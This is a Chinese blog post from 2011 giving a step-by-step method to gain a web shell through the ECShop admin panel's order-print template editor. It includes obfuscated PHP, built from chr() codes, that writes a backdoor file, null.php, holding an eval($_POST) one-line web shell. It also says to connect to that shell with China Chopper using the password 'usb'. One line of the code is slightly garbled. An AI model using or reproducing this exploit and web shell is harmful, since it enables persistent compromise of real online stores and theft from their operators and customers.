首页 > Web安全 > ecshop后台获取shell最新方法,通杀最新版本&后台低权限
2011
09-10

ecshop后台获取shell最新方法,通杀最新版本&后台低权限

简要描述: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马。详细说明:后台-订单管理-订单打印-选择源代码编辑-保存返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!漏洞情况:用菜刀连接 根目录生成null.php 密码usb

代码:

  1. <?php   
  2. $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);   
  3. $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);   
  4. $a=chr(119);   
  5. $fp=@fopen($filen,$a);   
  6. $msg=@fwrite($fp,$filec);   
  7. if($msgecho chr(79).chr(75).chr(33);   
  8. @fclose($fp);   
  9. ?>  
最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

留下一个回复

你的email不会被公开。